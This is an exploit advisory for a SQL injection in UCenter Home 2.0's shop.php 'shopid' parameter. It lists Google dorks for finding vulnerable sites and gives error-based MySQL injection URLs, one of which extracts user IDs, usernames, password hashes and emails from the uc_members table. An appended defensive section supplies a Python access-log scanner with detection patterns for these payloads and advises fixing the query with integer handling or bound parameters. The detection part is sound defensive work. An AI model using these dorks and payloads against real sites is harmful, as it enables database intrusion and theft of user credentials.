__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
DB : Okay.
Edit the DB name: `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okay.
Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
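
A defender-side check for the requests shown above, as an added example that is not part of the original advisory: it scans web access-log lines for `shop.php` hits whose `shopid` is not a plain integer and names which markers of the error-based payload are present. The log lines are constructed samples, and `inspect_line` and the signature names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Markers of the MySQL error-based technique seen in the payloads on this page.
SIGNATURES = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "group_by": re.compile(r"group\s+by", re.I),
    "information_schema": re.compile(r"information_schema", re.I),
    "hex_literal": re.compile(r"0x[0-9a-f]{2}", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
}
# Lazy match tolerates raw (unencoded) spaces inside the request target.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
NUMERIC = re.compile(r"[0-9]+")

# Constructed sample lines (addresses and timestamps are placeholders).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2000:00:00:01 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2000:00:00:02 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1 HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2000:00:00:03 +0000] "GET /shop.php?ac=view&shopid=253\' HTTP/1.1" 200 640',
    '203.0.113.9 - - [01/Jan/2000:00:00:04 +0000] "GET /index.php?shopid=abc HTTP/1.1" 200 100',
]

def inspect_line(line):
    """Return (shopid_value, [signature names]) for a suspicious shop.php hit, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("shop.php"):  # advisory spells it "Shop.php"
        return None
    for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
        if NUMERIC.fullmatch(value):
            continue  # a plain integer id is the only expected form
        decoded = unquote_plus(value)  # second pass catches double-encoded payloads
        names = sorted(n for n, rx in SIGNATURES.items() if rx.search(decoded))
        return value, names
    return None

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        finding = inspect_line(entry)
        if finding:
            print(entry.split()[0], "non-numeric shopid, markers:", finding[1])
```

Log matching only detects attempts; the fix belongs in the application, which should treat `shopid` as an integer or bind it as a query parameter before it reaches the SQL statement.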